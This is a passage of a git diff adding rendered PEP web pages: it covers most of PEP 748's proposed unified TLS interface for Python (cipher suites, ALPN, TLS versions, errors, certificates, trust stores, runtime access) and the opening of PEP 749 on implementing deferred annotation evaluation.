Specifically, SChannel defines a set of ALG_ID constants (C unsigned ints). +Each of these constants does not refer to an entire cipher suite, but instead an +individual algorithm. Some examples are CALG_3DES and CALG_AES_256, +which refer to the bulk encryption algorithm used in a cipher suite, +CALG_ECDH_EPHEM and CALG_RSA_KEYX which refer to part of the key +exchange algorithm used in a cipher suite, CALG_SHA_256 and CALG_SHA_384 +which refer to the message authentication code used in a cipher suite, and +CALG_ECDSA and CALG_RSA_SIGN which refer to the signing portions of the +key exchange algorithm.

+

In earlier versions of the SChannel API, these constants were used to define the +algorithms that could be used. The latest version, however, uses these constants +to prohibit which algorithms can be used.

+

This can be thought of as the half of OpenSSL’s functionality that Network +Framework doesn’t have: Network Framework only allows specifying exact cipher +suites (and a limited number of pre-defined cipher suite groups), whereas +SChannel only allows specifying parts of the cipher suite, while OpenSSL allows +both.

+

Determining which cipher suites are allowed on a given connection is done by +providing a pointer to an array of these ALG_ID constants. This means that +any suitable API must allow the Python code to determine which ALG_ID +constants must be provided.

+
+
+
Network Security Services (NSS)
+

NSS is Mozilla’s crypto and TLS library. It’s used in Firefox, Thunderbird, and +as an alternative to OpenSSL in multiple libraries, e.g. curl.

+

By default, NSS comes with secure configuration of allowed ciphers. On some +platforms such as Fedora, the list of enabled ciphers is globally configured in +a system policy. Generally, applications should not modify cipher suites unless +they have specific reasons to do so.

+

NSS has both process-global and per-connection settings for cipher suites. It does not have a concept of SSLContext like OpenSSL, but SSLContext-like behavior can easily be emulated. Specifically, ciphers can be enabled or disabled globally with SSL_CipherPrefSetDefault(PRInt32 cipher, PRBool enabled), and per connection with SSL_CipherPrefSet(PRFileDesc *fd, PRInt32 cipher, PRBool enabled). The cipher PRInt32 number is a signed 32-bit integer that directly corresponds to a registered IANA id, e.g. 0x1301 is TLS_AES_128_GCM_SHA256. Contrary to OpenSSL, the preference order of ciphers is fixed and cannot be modified at runtime.

+

Like Network Framework, NSS has no API for aggregated entries. Some consumers of +NSS have implemented custom mappings from OpenSSL cipher names and rules to NSS +ciphers, e.g. mod_nss.

+
+
+
Proposed Interface
+

The proposed interface for the new module is influenced by the combined set of limitations of the above implementations. Specifically, as every implementation except OpenSSL requires that each individual cipher be provided, there is no option but to take that lowest-common-denominator approach.

+

The simplest approach is to provide an enumerated type that includes a large +subset of the cipher suites defined for TLS. The values of the enum members will +be their two-octet cipher identifier as used in the TLS handshake, stored as a +16 bit integer. The names of the enum members will be their IANA-registered +cipher suite names.

+

As of now, the IANA cipher suite registry +contains over 320 cipher suites. A large portion of the cipher suites are +irrelevant for TLS connections to network services. Other suites specify +deprecated and insecure algorithms that are no longer provided by recent +versions of implementations. The enum contains the five fixed cipher suites +defined for TLS v1.3. For TLS v1.2, it only contains the cipher suites that +correspond to the TLS v1.3 cipher suites, with ECDHE key exchange (for perfect +forward secrecy) and ECDSA or RSA signatures, which are an additional ten cipher +suites.

+

In addition to this enum, the interface defines a default cipher suite list for +TLS v1.2, which includes only those defined cipher suites based on AES-GCM or +ChaCha20-Poly1305. The default cipher suite list for TLS v1.3 will +comprise the five cipher suites defined in the specification.

+

The current enum is quite restricted, including only cipher suites that provide +forward secrecy. Because the enum doesn’t contain every defined cipher, and also +to allow for forward-looking applications, all parts of this API that accept +CipherSuite objects will also accept raw 16-bit integers directly.

+
class CipherSuite(IntEnum):
+    """
+    Known cipher suites.
+
+    See: <https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml>
+    """
+
+    TLS_AES_128_GCM_SHA256 = 0x1301
+    TLS_AES_256_GCM_SHA384 = 0x1302
+    TLS_CHACHA20_POLY1305_SHA256 = 0x1303
+    TLS_AES_128_CCM_SHA256 = 0x1304
+    TLS_AES_128_CCM_8_SHA256 = 0x1305
+    TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xC02B
+    TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xC02C
+    TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xC02F
+    TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xC030
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM = 0xC0AC
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM = 0xC0AD
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 = 0xC0AE
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 = 0xC0AF
+    TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA8
+    TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA9
+
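Because the enum values are the IANA 16-bit identifiers, known suites can be resolved by value while unknown identifiers remain usable as plain integers. An illustrative helper:

def describe(suite: CipherSuite | int) -> str:
    # Known suites resolve to their IANA name; anything else is reported
    # as a raw 16-bit identifier, mirroring the CipherSuite | int pattern.
    try:
        return CipherSuite(suite).name
    except ValueError:
        return f"unknown cipher suite 0x{suite:04X}"

describe(0xC02C)  # 'TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384'
describe(0x1234)  # 'unknown cipher suite 0x1234'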
+
+

For Network Framework, these enum members directly refer to the values of the +cipher suite constants. For example, Network Framework defines the cipher suite +enum member tls_ciphersuite_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 as having +the value 0xC02C. Not coincidentally, that is identical to its value in the +above enum. This makes mapping between Network Framework and the above enum very +easy indeed.

+

For SChannel there is no easy direct mapping, due to the fact that SChannel +configures ciphers, instead of cipher suites. This represents an ongoing concern +with SChannel, which is that it is very difficult to configure in a specific +manner compared to other TLS implementations.

+

For the purposes of this PEP, any SChannel implementation will need to determine which ciphers to choose based on the enum members. This may be more permissive than the configured cipher suite list intends to allow, or it may be more restrictive, depending on the choices of the implementation. This PEP recommends that it be more restrictive, but of course this cannot be enforced.

+

Finally, we expect that for most users, secure defaults will be enough. When +specifying no list of ciphers, the implementations should use secure defaults +(possibly derived from system recommended settings).

+
+
+
+

Protocol Negotiation

+

ALPN allows for application-layer protocol negotiation (for example, of HTTP/2) as part of the TLS handshake. While ALPN is at a fundamental level built on top of bytestrings, string-based APIs are frequently problematic as they allow for errors in typing that can be hard to detect.

+

For this reason, this module will define a type that protocol negotiation +implementations can pass and be passed. This type would wrap a bytestring to +allow for aliases for well-known protocols. This allows us to avoid the problems +inherent in typos for well-known protocols, while allowing the full +extensibility of the protocol negotiation layer if needed by letting users pass +byte strings directly.

+
class NextProtocol(Enum):
+    """The underlying negotiated ("next") protocol."""
+
+    H2 = b"h2"
+    H2C = b"h2c"
+    HTTP1 = b"http/1.1"
+    WEBRTC = b"webrtc"
+    C_WEBRTC = b"c-webrtc"
+    FTP = b"ftp"
+    STUN = b"stun.nat-discovery"
+    TURN = b"stun.turn"
+
+
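For example (illustrative; TLSClientConfiguration is defined earlier in this PEP, and the custom protocol name is invented), a client can offer both well-known and custom protocols:

config = TLSClientConfiguration(
    # Prefer HTTP/2, fall back to HTTP/1.1, and also offer a custom
    # protocol identified by a raw bytestring.
    inner_protocols=[NextProtocol.H2, NextProtocol.HTTP1, b"my-proto/1"],
)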
+
+
+

TLS Versions

+

It is often useful to be able to restrict the versions of TLS you’re willing to +support. There are many security advantages in refusing to use old versions of +TLS, and some misbehaving servers will mishandle TLS clients advertising support +for newer versions.

+

The following enumerated type can be used to gate TLS versions. Forward-looking +applications should almost never set a maximum TLS version unless they +absolutely must, as a TLS implementation that is newer than the Python that uses +it may support TLS versions that are not in this enumerated type.

+

Additionally, this enumerated type defines two additional flags that can always +be used to request either the lowest or highest TLS version supported by an +implementation. As for cipher suites, we expect that for most users, secure +defaults will be enough. When specifying no list of TLS versions, the +implementations should use secure defaults (possibly derived from system +recommended settings).

+
class TLSVersion(Enum):
+    """
+    TLS versions.
+
+    The `MINIMUM_SUPPORTED` and `MAXIMUM_SUPPORTED` variants are "open ended",
+    and refer to the "lowest mutually supported" and "highest mutually supported"
+    TLS versions, respectively.
+    """
+
+    MINIMUM_SUPPORTED = "MINIMUM_SUPPORTED"
+    TLSv1_2 = "TLSv1.2"
+    TLSv1_3 = "TLSv1.3"
+    MAXIMUM_SUPPORTED = "MAXIMUM_SUPPORTED"
+
+
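Illustrative use with the configuration class defined earlier: pin the minimum to TLS 1.3 while leaving the maximum open-ended:

config = TLSClientConfiguration(
    lowest_supported_version=TLSVersion.TLSv1_3,
    highest_supported_version=TLSVersion.MAXIMUM_SUPPORTED,
)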
+
+
+

Errors

+

This module would define four base classes for use with error handling. Unlike +many of the other classes defined here, these classes are not abstract, as they +have no behavior. They exist simply to signal certain common behaviors. TLS +implementations should subclass these exceptions in their own packages, but +needn’t define any behavior for them.

+

In general, concrete implementations should subclass these exceptions rather +than throw them directly. This makes it moderately easier to determine which +concrete TLS implementation is in use during debugging of unexpected errors. +However, this is not mandatory.

+

The definitions of the errors are below:

+
class TLSError(Exception):
+    """
+    The base exception for all TLS related errors from any implementation.
+
+    Catching this error should be sufficient to catch *all* TLS errors,
+    regardless of what implementation is used.
+    """
+
+
+class WantWriteError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or buffer-only I/O is used.
+
+    This error signals that the requested
+    operation cannot complete until more data is written to the network,
+    or until the output buffer is drained.
+
+    This error should only be raised when it is completely impossible
+    to write any data. If a partial write is achievable then this should
+    not be raised.
+    """
+
+
+class WantReadError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or buffer-only I/O is used.
+
+    This error signals that the requested
+    operation cannot complete until more data is read from the network, or
+    until more data is available in the input buffer.
+
+    This error should only be raised when it is completely impossible to
+    read any data. If a partial read is achievable then this should not
+    be raised.
+    """
+
+
+class RaggedEOF(TLSError):
+    """A special signaling exception used when a TLS connection has been
+    closed gracelessly: that is, when a TLS CloseNotify was not received
+    from the peer before the underlying TCP socket reached EOF. This is a
+    so-called "ragged EOF".
+
+    This exception is not guaranteed to be raised in the face of a ragged
+    EOF: some implementations may not be able to detect or report the
+    ragged EOF.
+
+    This exception is not always a problem. Ragged EOFs are a concern only
+    when protocols are vulnerable to length truncation attacks. Any
+    protocol that can detect length truncation attacks at the application
+    layer (e.g. HTTP/1.1 and HTTP/2) is not vulnerable to this kind of
+    attack and so can ignore this exception.
+    """
+
+
+class ConfigurationError(TLSError):
+    """An special exception that implementations can use when the provided
+    configuration uses features not supported by that implementation."""
+
+
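A sketch of how calling code might rely on this hierarchy (ctx stands in for any concrete ClientContext implementation):

try:
    sock = ctx.connect(("example.com", 443))
except TLSError as exc:
    # Catches WantWriteError, WantReadError, RaggedEOF, ConfigurationError,
    # and any implementation-specific subclasses of TLSError.
    print(f"TLS failure: {exc!r}")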
+
+
+

Certificates

+

This module would define a concrete certificate class. This class would have +almost no behavior, as the goal of this module is not to provide all possible +relevant cryptographic functionality that could be provided by X.509 +certificates. Instead, all we need is the ability to signal the source of a +certificate to a concrete implementation.

+

For that reason, this certificate class defines three attributes, corresponding +to the three envisioned constructors: certificates from files, certificates from +memory, or certificates from arbitrary identifiers. It is possible that +implementations do not support all of these constructors, and they can +communicate this to users as described in the “Runtime” section below. +Certificates from arbitrary identifiers, in particular, are expected to be +useful primarily to users seeking to build integrations on top of HSMs, TPMs, +SSMs, and similar.

+

Specifically, this class does not parse any provided input to validate that it +is a correct certificate, and also does not provide any form of introspection +into a particular certificate. TLS implementations are not required to provide +such introspection either. Peer certificates that are received during the +handshake are provided as raw DER bytes.

+
class Certificate:
+    """Object representing a certificate used in TLS."""
+
+    __slots__ = (
+        "_buffer",
+        "_path",
+        "_id",
+    )
+
+    def __init__(
+        self, buffer: bytes | None = None, path: os.PathLike[str] | None = None, id: bytes | None = None
+    ):
+        """
+        Creates a Certificate object from a path, buffer, or ID.
+
+        If none of these is given, an exception is raised.
+        """
+
+        if buffer is None and path is None and id is None:
+            raise ValueError("Certificate cannot be empty.")
+
+        self._buffer = buffer
+        self._path = path
+        self._id = id
+
+    @classmethod
+    def from_buffer(cls, buffer: bytes) -> Certificate:
+        """
+        Creates a Certificate object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN CERTIFICATE" and another
+        series of dashes). In the absence of that preamble, the
+        implementation may assume that the certificate is DER-encoded
+        instead.
+        """
+        return cls(buffer=buffer)
+
+    @classmethod
+    def from_file(cls, path: os.PathLike[str]) -> Certificate:
+        """
+        Creates a Certificate object from a file on disk. The file on disk
+        should contain a series of bytes corresponding to a certificate that
+        may be either PEM-encoded or DER-encoded. If the bytes are PEM encoded
+        it *must* begin with the standard PEM preamble (a series of dashes
+        followed by the ASCII bytes "BEGIN CERTIFICATE" and another series of
+        dashes). In the absence of that preamble, the implementation may
+        assume that the certificate is DER-encoded instead.
+        """
+        return cls(path=path)
+
+    @classmethod
+    def from_id(cls, id: bytes) -> Certificate:
+        """
+        Creates a Certificate object from an arbitrary identifier. This may
+        be useful for implementations that rely on system certificate stores.
+        """
+        return cls(id=id)
+
+
+
+
+

Private Keys

+

This module would define a concrete private key class. Much like the +Certificate class, this class has three attributes to correspond to the +three constructors, and further has all the caveats of the Certificate +class.

+
class PrivateKey:
+    """Object representing a private key corresponding to a public key
+    for a certificate used in TLS."""
+
+    __slots__ = (
+        "_buffer",
+        "_path",
+        "_id",
+    )
+
+    def __init__(
+        self, buffer: bytes | None = None, path: os.PathLike | None = None, id: bytes | None = None
+    ):
+        """
+        Creates a PrivateKey object from a path, buffer, or ID.
+
+        If none of these is given, an exception is raised.
+        """
+
+        if buffer is None and path is None and id is None:
+            raise ValueError("PrivateKey cannot be empty.")
+
+        self._buffer = buffer
+        self._path = path
+        self._id = id
+
+    @classmethod
+    def from_buffer(cls, buffer: bytes) -> PrivateKey:
+        """
+        Creates a PrivateKey object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN", the key type, and
+        another series of dashes). In the absence of that preamble, the
+        implementation may assume that the private key is DER-encoded
+        instead.
+        """
+        return cls(buffer=buffer)
+
+    @classmethod
+    def from_file(cls, path: os.PathLike) -> PrivateKey:
+        """
+        Creates a PrivateKey object from a file on disk. The file on disk
+        should contain a series of bytes corresponding to a private key that
+        may be either PEM-encoded or DER-encoded. If the bytes are PEM encoded,
+        they *must* begin with the standard PEM preamble (a series of dashes
+        followed by the ASCII bytes "BEGIN", the key type, and another series
+        of dashes). In the absence of that preamble, the implementation may
+        assume that the private key is DER-encoded instead.
+        """
+        return cls(path=path)
+
+    @classmethod
+    def from_id(cls, id: bytes) -> PrivateKey:
+        """
+        Creates a PrivateKey object from an arbitrary identifier. This may
+        be useful for implementations that rely on system private key stores.
+        """
+        return cls(id=id)
+
+
+
+
+

Signing Chain

+

In order to authenticate themselves, TLS participants need to provide a leaf +certificate with a chain leading up to some root certificate that is trusted by +the other side. Servers always need to authenticate themselves to clients, but +clients can also authenticate themselves to servers during client +authentication. Additionally, the leaf certificate must be accompanied by a +private key, which can either be stored in a separate object, or together with +the leaf certificate itself. This module defines the collection of these objects +as a SigningChain as detailed below:

+
class SigningChain:
+    """Object representing a certificate chain used in TLS."""
+
+    leaf: tuple[Certificate, PrivateKey | None]
+    chain: list[Certificate]
+
+    def __init__(
+        self,
+        leaf: tuple[Certificate, PrivateKey | None],
+        chain: Sequence[Certificate] | None = None,
+    ):
+        """Initializes a SigningChain object."""
+        self.leaf = leaf
+        if chain is None:
+            chain = []
+        self.chain = list(chain)
+
+
+

As shown in the configuration classes above, a client can have one signing chain +in the case of client authentication or none otherwise. A server can have a +sequence of signing chains, which is useful when it is responsible for multiple +domains.
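For illustration, a server responsible for a single domain that presents one intermediate certificate might assemble its chain as follows. This is a sketch using the classes defined above; the file paths are hypothetical:

leaf_cert = Certificate.from_file("/etc/myserver/leaf.pem")
leaf_key = PrivateKey.from_file("/etc/myserver/leaf.key")
intermediate = Certificate.from_file("/etc/myserver/intermediate.pem")

# The leaf and its private key travel together; intermediates follow in order.
chain = SigningChain(leaf=(leaf_cert, leaf_key), chain=[intermediate])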

+
+
+

Trust Store

+

As discussed above, loading a trust store represents an issue because different +TLS implementations vary wildly in how they allow users to select trust stores. +For this reason, we need to provide a model that assumes very little about the +form that trust stores take.

+

This problem is the same as the one that the Certificate and PrivateKey +types need to solve. For this reason, we use the exact same model, creating a +concrete class that captures the various ways in which users could define a trust +store.

+

A given TLS implementation is not required to handle all possible trust stores. +However, it is strongly recommended that a given TLS implementation handle the +system constructor if at all possible, as this is the most commonly used validation +trust store. TLS implementations can communicate unsupported +options as described in the “Runtime Access” section below.

+
class TrustStore:
+    """
+    The trust store that is used to verify certificate validity.
+    """
+
+    __slots__ = (
+        "_buffer",
+        "_path",
+        "_id",
+    )
+
+    def __init__(
+        self, buffer: bytes | None = None, path: os.PathLike[str] | None = None, id: bytes | None = None
+    ):
+        """
+        Creates a TrustStore object from a path, buffer, or ID.
+
+        If none of these is given, the default system trust store is used.
+        """
+
+        self._buffer = buffer
+        self._path = path
+        self._id = id
+
+    @classmethod
+    def system(cls) -> TrustStore:
+        """
+        Returns a TrustStore object that represents the system trust
+        database.
+        """
+        return cls()
+
+    @classmethod
+    def from_buffer(cls, buffer: bytes) -> TrustStore:
+        """
+        Initializes a trust store from a buffer of PEM-encoded certificates.
+        """
+        return cls(buffer=buffer)
+
+    @classmethod
+    def from_file(cls, path: os.PathLike[str]) -> TrustStore:
+        """
+        Initializes a trust store from a single file containing PEMs.
+        """
+        return cls(path=path)
+
+    @classmethod
+    def from_id(cls, id: bytes) -> TrustStore:
+        """
+        Initializes a trust store from an arbitrary identifier.
+        """
+        return cls(id=id)
+
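For example, an application might use the system store by default and pin a custom CA bundle only when required. A sketch; the bundle path is hypothetical:

# Validate peers against the platform's default trust database.
store = TrustStore.system()

# Or pin validation to a custom CA bundle on disk.
pinned = TrustStore.from_file("/etc/myapp/ca-bundle.pem")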
+
+
+
+

Runtime Access

+

A not-uncommon use case is for library users to want to specify the TLS +implementation to use while allowing the library to configure the details of the +actual TLS connection. For example, users of requests may want to be +able to select between OpenSSL and a platform-native solution on Windows and +macOS, or between OpenSSL and NSS on some Linux platforms. These users, however, +may not care about exactly how their TLS configuration is done.

+

This poses two problems: given an arbitrary concrete implementation, how can a +library:

+
    +
  • Work out whether the implementation supports particular constructors for certificates +or trust stores (e.g. from arbitrary identifiers)?
  • +
  • Get the correct types for the two context classes?
  • +
+

Constructing certificate and trust store objects should be possible outside of +the implementation. Implementations therefore need to provide a way for +users to verify whether an implementation is compatible with user-constructed +certificates and trust stores. To this end, each implementation should provide a +validate_config method that takes a TLSClientConfiguration or +TLSServerConfiguration object and raises an exception if unsupported +constructors were used.

+

For the types, there are two options: either all concrete implementations can be +required to fit into a specific naming scheme, or we can provide an API that +makes it possible to retrieve these objects.

+

This PEP proposes that we use the second approach. This grants the greatest +freedom to concrete implementations to structure their code as they see fit, +requiring only that they provide a single object that has the appropriate +properties in place. Users can then pass this implementation object to libraries +that support it, and those libraries can take care of configuring and using the +concrete implementation.

+

All concrete implementations must provide a method of obtaining a +TLSImplementation object. The TLSImplementation object can be a global +singleton or can be created by a callable if there is an advantage in doing +that.

+

The TLSImplementation object has the following definition:

+
class TLSImplementation(Generic[_ClientContext, _ServerContext]):
+    __slots__ = (
+        "_client_context",
+        "_server_context",
+        "_validate_config",
+    )
+
+    def __init__(
+        self,
+        client_context: type[_ClientContext],
+        server_context: type[_ServerContext],
+        validate_config: Callable[[TLSClientConfiguration | TLSServerConfiguration], None],
+    ) -> None:
+        self._client_context = client_context
+        self._server_context = server_context
+        self._validate_config = validate_config
+
+
+

The first two properties must provide the concrete implementation of the +relevant Protocol class. For example, for the client context:

+
@property
+def client_context(self) -> type[_ClientContext]:
+    """The concrete implementation of the PEP 543 Client Context object,
+    if this TLS implementation supports being the client on a TLS connection.
+    """
+    return self._client_context
+
+
+

This ensures that code like this will work for any implementation:

+
client_config = TLSClientConfiguration()
+client_context = implementation.client_context(client_config)
+
+
+

The third property must provide a function that verifies whether a given TLS +configuration contains implementation-compatible certificates, private keys, and +a trust store:

+
@property
+def validate_config(self) -> Callable[[TLSClientConfiguration | TLSServerConfiguration], None]:
+    """A function that reveals whether this TLS implementation supports a
+    particular TLS configuration.
+    """
+    return self._validate_config
+
+
+

Note that this function only needs to verify that supported constructors were +used for the certificates, private keys, and trust store. It does not need to +parse or retrieve the objects to validate them further.

+
+
+
+

Insecure Usage

+

All of the above assumes that users want to use the module in a secure way. +Sometimes, users want to do imprudent things like disable certificate validation +for testing purposes. To this end, we propose a separate insecure module +that allows users to do this. This module contains insecure variants of the +configuration, context, and implementation objects, which make it possible to disable +certificate validation as well as the server hostname check.

+

This functionality is placed in a separate module to make it as hard as possible +for legitimate users to use the insecure functionality by accident. +Additionally, the module defines a new warning, SecurityWarning, and warns loudly +at every step of creating an insecure connection.

+

This module is only intended for testing purposes. In real-world situations +where a user wants to connect to some IoT device which only has a self-signed +certificate, it is strongly recommended to add this certificate into a custom +trust store, rather than using the insecure module to disable certificate +validation.

+
+
+
+

Changes to the Standard Library

+

The portions of the standard library that interact with TLS should be revised to +use these Protocol classes. This will allow them to function with other TLS +implementations. This includes the following modules:

+ +
+

Migration of the ssl module

+

Naturally, we will need to extend the ssl module itself to conform to +these Protocol classes. This extension will take the form of new classes, +potentially in an entirely new module. This will allow applications that take +advantage of the current ssl module to continue to do so, while enabling +the new APIs for applications and libraries that want to use them.

+

In general, migrating from the ssl module to the new Protocol classes is +not expected to be one-to-one. This is normally acceptable: most tools that use +the ssl module hide it from the user, and so refactoring to use the new +module should be invisible.

+

However, a specific problem comes from libraries or applications that leak +exceptions from the ssl module, either as part of their defined API or by +accident (which is easily done). Users of those tools may have written code that +tolerates and handles exceptions from the ssl module being raised: +migrating to the protocol classes presented here would potentially cause the +exceptions defined above to be raised instead, and existing except blocks +will not catch them.

+

For this reason, part of the migration of the ssl module would require +that the exceptions in the ssl module alias those defined above. That is, +they would require the following statements to all succeed:

+
assert ssl.SSLError is tls.TLSError
+assert ssl.SSLWantReadError is tls.WantReadError
+assert ssl.SSLWantWriteError is tls.WantWriteError
+
+
+

The exact mechanics of how this will be done are beyond the scope of this PEP; +they are made more complex by the fact that the current ssl exceptions +are defined in C code. More details can be found in an email sent to the +Security-SIG by Christian Heimes.

+
+
+
+

Future

+

Major future TLS features may require revisions of these protocol classes. These +revisions should be made cautiously: many implementations may not be able to +move forward swiftly, and will be invalidated by changes in these protocol +classes. This is acceptable, but wherever possible features that are specific to +individual implementations should not be added to the protocol classes. The +protocol classes should restrict themselves to high-level descriptions of +IETF-specified features.

+

However, well-justified extensions to this API absolutely should be made. The +focus of this API is to provide a unifying lowest-common-denominator +configuration option for the Python community. TLS is not a static target, and +as TLS evolves so must this API.

+
+
+

Credits

+

This PEP is adapted substantially from PEP 543, which was withdrawn in 2020. +PEP 543 was authored by Cory Benfield and Christian Heimes, and received +extensive review from a number of individuals in the community who have +substantially helped shape it. Detailed review for both PEP 543 and this +PEP was provided by:

+
    +
  • Alex Chan
  • +
  • Alex Gaynor
  • +
  • Antoine Pitrou
  • +
  • Ashwini Oruganti
  • +
  • Donald Stufft
  • +
  • Ethan Furman
  • +
  • Glyph
  • +
  • Hynek Schlawack
  • +
  • Jim J Jewett
  • +
  • Nathaniel J. Smith
  • +
  • Alyssa Coghlan
  • +
  • Paul Kehrer
  • +
  • Steve Dower
  • +
  • Steven Fackler
  • +
  • Wes Turner
  • +
  • Will Bond
  • +
  • Cory Benfield
  • +
  • Marc-André Lemburg
  • +
  • Seth M. Larson
  • +
  • Victor Stinner
  • +
  • Ronald Oussoren
  • +
+

Further review of PEP 543 was provided by the Security-SIG and python-ideas +mailing lists.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0748.rst

+

Last modified: 2024-12-09 02:51:16 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0749/index.html b/pep-0749/index.html new file mode 100644 index 00000000000..f8f56e06b4e --- /dev/null +++ b/pep-0749/index.html @@ -0,0 +1,1123 @@ + PEP 749 – Implementing PEP 649 | peps.python.org
+
+


+ + +
+
+
+

PEP 749 – Implementing PEP 649

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Requires:
+
649
+
Created:
+
28-May-2024
+
Python-Version:
+
3.14
+
Post-History:
+
04-Jun-2024
+
+
+
+
+
+

Abstract

+

This PEP supplements PEP 649 by providing various tweaks and additions to its +specification:

+
    +
  • from __future__ import annotations (PEP 563) will continue to exist with +its current behavior at least until Python 3.13 reaches its end-of-life. Subsequently, +it will be deprecated and eventually removed.
  • +
  • A new standard library module, annotationlib, is added to provide tooling for +annotations. It will include the get_annotations() function, an enum for annotation +formats, a ForwardRef class, and a helper function for calling __annotate__ functions.
  • +
  • Annotations in the REPL are lazily evaluated, just like other module-level annotations.
  • +
  • We specify the behavior of wrapper objects that provide annotations, such as classmethod() +and code that uses functools.wraps().
  • +
  • There will not be a code flag for marking __annotate__ functions +that can be run in a “fake globals” environment. Instead, we add a fourth format, +VALUE_WITH_FAKE_GLOBALS, to allow third-party implementors of annotate functions to +indicate what formats they support.
  • +
  • Deleting the __annotations__ attribute directly will also clear __annotate__.
  • +
  • We add functionality to allow evaluating type alias values and type parameter bounds and defaults +(which were added by PEP 695 and PEP 696) using PEP 649-like semantics.
  • +
  • The SOURCE format is renamed to STRING to improve clarity and reduce the risk of +user confusion.
  • +
+
+
+

Motivation

+

PEP 649 provides an excellent framework for creating better semantics for +annotations in Python. It solves a common pain point for users of annotations, +including those using static type hints as well as those using runtime typing, +and it makes the language more elegant and powerful. +The PEP was originally proposed in 2021 for Python 3.10, +and it was accepted in 2023. However, the implementation took longer than anticipated, +and now the PEP is expected to be implemented in Python 3.14.

+

I have started working on the implementation of the PEP in CPython. I found that +the PEP leaves some areas underspecified, and some +of its decisions in corner cases are questionable. This new PEP proposes several +changes and additions to the specification to address these issues.

+

This PEP supplements rather than supersedes PEP 649. The changes proposed here +should make the overall user experience better, but they do not change the +general framework of the earlier PEP.

+
+
+

The future of from __future__ import annotations

+

PEP 563 previously introduced the future import from __future__ import annotations, +which changes all annotations to strings. PEP 649 proposes an alternative approach +that does not require this future import, and states:

+
+
If this PEP is accepted, PEP 563 will be deprecated and eventually removed.
+

However, the PEP does not provide a detailed plan for this deprecation.

+

There is some previous discussion of this topic on Discourse +(note that in the linked post I proposed something different from what is proposed here).

+
+

Specification

+

We suggest the following deprecation plan:

+
    +
  • In Python 3.14, from __future__ import annotations will continue to work as it +did before, converting annotations into strings.
      +
    • If the future import is active, the __annotate__ function of objects with +annotations will return the annotations as strings when called with the VALUE +format, reflecting the behavior of __annotations__.
    • +
    +
  • +
  • Sometime after the last release that did not support PEP 649 semantics (expected to be 3.13) +reaches its end-of-life, from __future__ import annotations is deprecated. Compiling +any code that uses the future import will emit a DeprecationWarning. This will +happen no sooner than the first release after Python 3.13 reaches its end-of-life, but +the community may decide to wait longer.
  • +
  • After at least two releases, the future import is removed, and annotations are always +evaluated as per PEP 649. Code that continues to use the future import will raise +a SyntaxError, similar to any other undefined future import.
  • +
+
+
+

Rejected alternatives

+

Immediately make the future import a no-op: We considered applying PEP 649 semantics +to all code in Python 3.14, making the future import a no-op. However, this would break +code that works in 3.13 under the following set of conditions:

+
    +
  • from __future__ import annotations is active
  • +
  • There are annotations that rely on forward references
  • +
  • Annotations are eagerly evaluated at import time, such as by a metaclass or +by a class or function decorator. For example, this currently applies to the +released version of typing_extensions.TypedDict.
  • +
+

This is expected to be a common pattern, so we cannot afford to break such code during +the upgrade from 3.13 to 3.14.

+

Such code would still break when the future import is eventually removed. However, this +is many years in the future, giving affected decorators plenty of time to update their code.

+

Immediately deprecate the future import: Instead of waiting until Python 3.13 reaches +its end-of-life, we could immediately start emitting warnings when the future import is +used. However, many libraries are already using from __future__ import annotations as +an elegant way to enable unrestricted forward references in their annotations. If we deprecate +the future import immediately, it would be impossible for these libraries to use unrestricted +forward references on all supported Python versions while avoiding deprecation warnings: +unlike other features deprecated from the standard library, a __future__ import must +be the first statement in a given module, meaning it would be impossible to only +conditionally import __future__.annotations on Python 3.13 and lower. (The necessary +sys.version_info check would count as a statement preceding the __future__ import.)
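For example, the obvious attempt at a conditional future import fails at compile time:

import sys

if sys.version_info < (3, 14):
    # SyntaxError: from __future__ imports must occur at the beginning of the file
    from __future__ import annotations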

+

Keep the future import around forever: We could also decide to keep the future import +indefinitely. However, this would permanently bifurcate the behavior of the Python +language. This is undesirable; the language should have only a single set of semantics, +not two permanently different modes.

+

Make the future import a no-op in the future: Instead of eventually making +from __future__ import annotations a SyntaxError, we could make it do nothing +at some point after Python 3.13 reaches its end-of-life. This still has some +of the same issues outlined above around making it a no-op now, although the ecosystem +would have had much longer to adapt. It is better to have users explicitly remove +the future import from their code once they have confirmed they do not +rely on stringized annotations.

+
+
+
+

New annotationlib module

+

PEP 649 proposes to add tooling related to annotations to the inspect +module. However, that module is rather large, has direct or indirect dependencies +on at least 35 other standard library modules, and is so slow to import that other +standard library modules are often discouraged from importing it. Furthermore, we +anticipate adding more tools in addition to the inspect.get_annotations() +function and the VALUE, FORWARDREF, and SOURCE formats.

+

A new standard library module provides a logical home for this functionality and +also enables us to add more tooling that is useful for consumers of annotations.

+
+

Rationale

+

